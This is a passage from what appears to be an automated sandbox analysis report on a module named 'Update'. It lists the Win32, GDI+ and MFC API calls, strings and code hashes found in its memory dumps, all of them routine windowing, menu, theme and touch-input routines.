                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
                                              • String ID:
                                              • API String ID: 2171526683-0
                                              • Opcode ID: e747a17e75a2658de54ae861425c3dbb41a2a356db331e0b9dacecc10f1654e8
                                              • Instruction ID: 8f623b684211c06c7bb7ce42c0f3ad8cbab76d3323ba22988c7be537a37e85b1
                                              • Opcode Fuzzy Hash: e747a17e75a2658de54ae861425c3dbb41a2a356db331e0b9dacecc10f1654e8
                                              • Instruction Fuzzy Hash: 98612271942229AFDF24DF64DD88BD9B7B5BB19304F1000E9E509E62A0DB749ED0DF50
                                              APIs
                                              • __EH_prolog3_catch.LIBCMT ref: 6C1DAC57
                                              • FindResourceW.KERNEL32(?,00000000,00000005,00000024,6C1C7C26), ref: 6C1DAC98
                                              • LoadResource.KERNEL32(?,00000000), ref: 6C1DACA4
                                              • LockResource.KERNEL32(?,00000024,6C1C7C26), ref: 6C1DACB4
                                              • GetDesktopWindow.USER32 ref: 6C1DACEB
                                              • IsWindowEnabled.USER32(00000000), ref: 6C1DACF6
                                              • EnableWindow.USER32(00000000,00000000), ref: 6C1DAD02
                                              • EnableWindow.USER32(00000000,00000001), ref: 6C1DADE6
                                              • GetActiveWindow.USER32 ref: 6C1DADF0
                                              • SetActiveWindow.USER32(00000000,?,00000024,6C1C7C26), ref: 6C1DADFC
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindH_prolog3_catchLoadLock
                                              • String ID:
                                              • API String ID: 723642982-0
                                              • Opcode ID: 716096c253566a113fbdb0a317f7076219eba63727c47ba81d6dba590306974d
                                              • Instruction ID: e75de50eae25e715563197e3a64d65d71eedd253202a2f2050b8e8c36510ff89
                                              • Opcode Fuzzy Hash: 716096c253566a113fbdb0a317f7076219eba63727c47ba81d6dba590306974d
                                              • Instruction Fuzzy Hash: 4B517170A01B16DBDF00DFA0C884BEEBBB9BF49719F150115D916B7791DB34A804CBA1
                                              APIs
                                              • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C1D2A05
                                              • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C1D2A4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
                                              • API String ID: 410705778-5890034
                                              • Opcode ID: 2a15723c028da69418c00e09b003bafd160d014206067d20f589993d8cdfc4cc
                                              • Instruction ID: 29d925f22728c254e3e56931cdad0da4273986561471475c6ad1b40143cced18
                                              • Opcode Fuzzy Hash: 2a15723c028da69418c00e09b003bafd160d014206067d20f589993d8cdfc4cc
                                              • Instruction Fuzzy Hash: B2B1CF32A00219AFCF05DBA4D858AFEBBBAFF49314F150069F912A7750DB34AD15DB60
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C218B57
                                              • GetParent.USER32(?), ref: 6C218B6B
                                                • Part of subcall function 6C1E4E72: GetWindowLongW.USER32(?,000000EC), ref: 6C1E4E7F
                                                • Part of subcall function 6C28515C: __EH_prolog3.LIBCMT ref: 6C285163
                                                • Part of subcall function 6C28515C: SendMessageW.USER32(00000000,0000007F,00000000,00000000), ref: 6C285186
                                                • Part of subcall function 6C28515C: SendMessageW.USER32(00000000,0000007F,00000001,00000000), ref: 6C28519A
                                                • Part of subcall function 6C28515C: GetClassLongW.USER32(00000000,000000DE), ref: 6C2851F7
                                                • Part of subcall function 6C28515C: GetClassLongW.USER32(00000000,000000F2), ref: 6C285208
                                              • GetSystemMetrics.USER32(00000032), ref: 6C218BB4
                                              • GetSystemMetrics.USER32(00000031), ref: 6C218BBF
                                              • GetSystemMetrics.USER32(00000004), ref: 6C218BD0
                                              • GetSystemMetrics.USER32(00000004), ref: 6C218BDC
                                              • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 6C218C39
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$Long$ClassH_prolog3MessageSend$DrawIconParentWindow
                                              • String ID: 0^5l
                                              • API String ID: 1977492230-1366870978
                                              • Opcode ID: b0050d940c538af9ae4aa72abb58662ebf8ce6463a69fba4fac8481b6ece4f87
                                              • Instruction ID: df5d6dd08d45061409ad5b286242aa7aaeba2231188141250663bcaba79a1bcf
                                              • Opcode Fuzzy Hash: b0050d940c538af9ae4aa72abb58662ebf8ce6463a69fba4fac8481b6ece4f87
                                              • Instruction Fuzzy Hash: 93917B75A016199FCF05DFA8C884AEEBBF6BF49314F15012AF906E7780DB74A901CB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C2B2556
                                              • GetSystemMenu.USER32(?,00000000), ref: 6C2B2607
                                              • IsMenu.USER32(?), ref: 6C2B261D
                                              • IsMenu.USER32(?), ref: 6C2B2631
                                              • GetWindowLongW.USER32(?,000000F0), ref: 6C2B2656
                                              • GetMenuItemInfoW.USER32(00000000,0000F060,00000000,00000030), ref: 6C2B2758
                                              • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6C2B27BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Menu$Window$H_prolog3InfoItemLongRedrawSystem
                                              • String ID: 0
                                              • API String ID: 2328916801-4108050209
                                              • Opcode ID: 8a545d261c2005e3d0904b5e4f8595dcf701da196fb2c808052c492c50e7b958
                                              • Instruction ID: 818b7cface1efe8c18625f1d9e50a1da08aa8ae80b5994e524aa6f34913066ea
                                              • Opcode Fuzzy Hash: 8a545d261c2005e3d0904b5e4f8595dcf701da196fb2c808052c492c50e7b958
                                              • Instruction Fuzzy Hash: 037172B074170BAFEB04CBB4C998BEDB7B4BF05359F200129E925A66D1DB70AA04CB55
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C2DCD14
                                                • Part of subcall function 6C2423BE: __EH_prolog3.LIBCMT ref: 6C2423C5
                                                • Part of subcall function 6C303520: SetRectEmpty.USER32(?), ref: 6C303555
                                              • SetRectEmpty.USER32(?), ref: 6C2DCE44
                                              • SetRectEmpty.USER32 ref: 6C2DCE55
                                              • SetRectEmpty.USER32(?), ref: 6C2DCE5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: EmptyRect$H_prolog3
                                              • String ID: (^4l$D}4l$False$True
                                              • API String ID: 3752103406-1279186606
                                              • Opcode ID: 29389383539929c16832836da6ba6ae769e34bed868a40b252ef2b6a6795de4e
                                              • Instruction ID: 79e84ff5edc5a69e4bd581949f9ed0d6ba20a19fb1e080a2d40f30c77df6923b
                                              • Opcode Fuzzy Hash: 29389383539929c16832836da6ba6ae769e34bed868a40b252ef2b6a6795de4e
                                              • Instruction Fuzzy Hash: B251FDB09052018FDB4ACF28C484BE9BBE8BF19304F5881BEA81D9F396CB741204CF65
                                              APIs
                                              • LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 6C1CA60F
                                                • Part of subcall function 6C1CA43B: GetProcAddress.KERNEL32(00000000,?), ref: 6C1CA469
                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,6C1D3B60,00000000,6C38A3F8,00000014,6C1D3C28,InitCommonControlsEx,6C38A418,00000010,6C1D91DD,00000008,?), ref: 6C1CA529
                                              • SetLastError.KERNEL32(0000006F,?,6C1D3B60,00000000,6C38A3F8,00000014,6C1D3C28,InitCommonControlsEx,6C38A418,00000010,6C1D91DD,00000008,?), ref: 6C1CA53D
                                              • GetLastError.KERNEL32(00000020), ref: 6C1CA594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
                                              • String ID: $@$Comctl32.dll$GetModuleHandleExW
                                              • API String ID: 3640817601-4183358198
                                              • Opcode ID: 50e8c9a0b632df1bdc67845bc0ce7c5aa95388420d506f81999baa8177c37679
                                              • Instruction ID: ab89b9311e6cc8fecb11453bbf9b9e610cc17849a1b254720f9bde81498d57e6
                                              • Opcode Fuzzy Hash: 50e8c9a0b632df1bdc67845bc0ce7c5aa95388420d506f81999baa8177c37679
                                              • Instruction Fuzzy Hash: 47412BB0B012249AEF228F64DC8CBDD76BCEB65718F204256F514D6990EB7CCA85CF52
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1DC852
                                              • GetDesktopWindow.USER32 ref: 6C1DC898
                                              • GetWindow.USER32(00000000), ref: 6C1DC89F
                                              • IsWindowEnabled.USER32(00000000), ref: 6C1DC8AF
                                              • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 6C1DC8DA
                                              • EnableWindow.USER32(00000000,00000000), ref: 6C1DC8E6
                                              • GetWindow.USER32(00000000,00000002), ref: 6C1DC8FB
                                              • IsWindow.USER32(00000000), ref: 6C1DC998
                                              • EnableWindow.USER32(?,00000001), ref: 6C1DC9AD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Enable$DesktopEnabledH_prolog3MessageSend
                                              • String ID:
                                              • API String ID: 1053735628-0
                                              • Opcode ID: ba187224a1717eeadc92fe3e65d8fb3170a0206e872c26b275f59cf343171378
                                              • Instruction ID: 21134cb03a068d45650db449e32a6143584c2fb3edea5001b11a29a20f7feb28
                                              • Opcode Fuzzy Hash: ba187224a1717eeadc92fe3e65d8fb3170a0206e872c26b275f59cf343171378
                                              • Instruction Fuzzy Hash: AC41E732A426129BEB15AF65C854BDF77B8BF12718F120929E91AF6680DF70E805CB50
                                              APIs
                                                • Part of subcall function 6C24AC24: GdipGetImagePixelFormat.GDIPLUS(?,6C3A1B70,00000000,00000000,?,6C24ADCC,8BAE044A,?,00000000,6C3A1B70), ref: 6C24AC32
                                                • Part of subcall function 6C24AC68: GdipGetImagePalette.GDIPLUS(?,00000000,?,?,?,6C24AEEB,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,8BAE044A), ref: 6C24AC77
                                              • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,00000000,?,00000000,00000000,00000000,8BAE044A,?,00000000,6C3A1B70), ref: 6C24AFE0
                                              • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,00000000,?,00000000,00000000,00000000,8BAE044A,?,00000000), ref: 6C24B090
                                              • GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6C24B0E2
                                              • GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6C24B0ED
                                              • GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000), ref: 6C24B0F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPalettePixelUnlock
                                              • String ID: &$ &
                                              • API String ID: 1665940520-360661826
                                              • Opcode ID: 8073cca5531be4405c0693a21951e48b1b6b3616640e7bbe28dfacc3da052783
                                              • Instruction ID: 11c4a83355bb8daebf3f16d50f568bf84db5c903505aab6079c5452f711d97ff
                                              • Opcode Fuzzy Hash: 8073cca5531be4405c0693a21951e48b1b6b3616640e7bbe28dfacc3da052783
                                              • Instruction Fuzzy Hash: 03A173F1A0122D9BCB298F14CC80AEDB7B9EF44318F5181A9EA19A7741D7319D85CF98
                                              APIs
                                              • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C1D6B11
                                              • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 6C1D6B46
                                              • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 6C1D6B6E
                                              • ScreenToClient.USER32(?,?), ref: 6C1D6BFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressProc$ClientHandleModuleScreen
                                              • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
                                              • API String ID: 471820996-2905070798
                                              • Opcode ID: f1b91e2f0c3e291d6668ec89a227963fc2e6269d4c063585862938a8c614f6ef
                                              • Instruction ID: 0a8d298de4adeb8aa11fc59057c61771ce884e48261e16615ded7b25cdcf8ba5
                                              • Opcode Fuzzy Hash: f1b91e2f0c3e291d6668ec89a227963fc2e6269d4c063585862938a8c614f6ef
                                              • Instruction Fuzzy Hash: C381A474700A0AEFCB05CF69D994AA9BBB9FF4A344B110569E805D7B60DB35F950CF80
                                              APIs
                                              • SystemTimeToVariantTime.OLEAUT32(?,?), ref: 6C20EEA1
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 6C20EECD
                                              • __EH_prolog3.LIBCMT ref: 6C20EF39
                                              • VarBstrFromDate.OLEAUT32(?,?,?,?,?), ref: 6C20EFD5
                                              • SysFreeString.OLEAUT32(?), ref: 6C20F028
                                              • SysFreeString.OLEAUT32(?), ref: 6C20F065
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Time$FreeStringSystemVariant$BstrDateFromH_prolog3
                                              • String ID: Invalid DateTime
                                              • API String ID: 4133050923-2190634649
                                              • Opcode ID: 84bd411396fea1bb2e713307566d2e6ce962d86ffaef944630d948e129c7ee08
                                              • Instruction ID: 1b1f6db345eb6d241cf8ebac2a36ca1b0d5e2a9c3ca257590fbc98badcb0f2f0
                                              • Opcode Fuzzy Hash: 84bd411396fea1bb2e713307566d2e6ce962d86ffaef944630d948e129c7ee08
                                              • Instruction Fuzzy Hash: 4051D63570010EABDB00EFA8C844AEEB774EF1571CF54420AF955ABB80EB309D91C7A5
                                              APIs
                                              • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C1D69A4
                                              • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 6C1D69D9
                                              • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 6C1D6A01
                                              • ScreenToClient.USER32(?,?), ref: 6C1D6AC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressProc$ClientHandleModuleScreen
                                              • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
                                              • API String ID: 471820996-1853737257
                                              • Opcode ID: 1a28fdee1de0730ac8dd115a10291dab754e52835c0e413938a86da5c949adb6
                                              • Instruction ID: 6895fd60ca9d0cc6a139b3bdd436ad0185e6e6d37880f16004e534c2cc68be56
                                              • Opcode Fuzzy Hash: 1a28fdee1de0730ac8dd115a10291dab754e52835c0e413938a86da5c949adb6
                                              • Instruction Fuzzy Hash: 8E41D535701214EFCF04CF69C8489AD7BBDEB8A328B21486AF906D3794EB75E901CB50
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C300F7B
                                              • IsAppThemed.UXTHEME(00000000,00000000,0000003C,6C300710,?,6C3010C7,00000000,?,00000000), ref: 6C300FBD
                                              • OpenThemeData.UXTHEME(?,Button,?,6C3010C7,00000000,?,00000000), ref: 6C300FE8
                                              • GetThemePartSize.UXTHEME(?,?,00000003,00000005,00000000,00000001,00000000,00000000,?,?,6C3010C7,00000000,?,00000000), ref: 6C30102F
                                              • CloseThemeData.UXTHEME(?,?,?,6C3010C7,00000000,?,00000000), ref: 6C301050
                                              • GetObjectW.GDI32(?,00000018,?), ref: 6C301079
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Theme$Data$CloseH_prolog3ObjectOpenPartSizeThemed
                                              • String ID: Button
                                              • API String ID: 1633685699-1034594571
                                              • Opcode ID: b122b4c869bc36f036e49b247f7aa1934f932eea5d1322236c4336fc7d43a7ce
                                              • Instruction ID: c24102389c6292cf6ae829e98768195e439f188cab1b0612fa446ff49327143d
                                              • Opcode Fuzzy Hash: b122b4c869bc36f036e49b247f7aa1934f932eea5d1322236c4336fc7d43a7ce
                                              • Instruction Fuzzy Hash: 32318F72B0020AAFEB059F64C855FEEB7B9BF44704F100029F652EA680EB75DA05DF61
                                              APIs
                                              • IsWindowEnabled.USER32(00000000), ref: 6C1F5029
                                              • EnableWindow.USER32(00000000,00000000), ref: 6C1F5035
                                              • GetCapture.USER32 ref: 6C1F5042
                                              • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C1F5051
                                              • EnableWindow.USER32(00000000,00000001), ref: 6C1F512E
                                              • GetActiveWindow.USER32 ref: 6C1F5138
                                              • SetActiveWindow.USER32(00000000), ref: 6C1F5143
                                              • EnableWindow.USER32(00000000,00000001), ref: 6C1F5182
                                                • Part of subcall function 6C1D8DAA: UnhookWindowsHookEx.USER32(?), ref: 6C1D8DD4
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
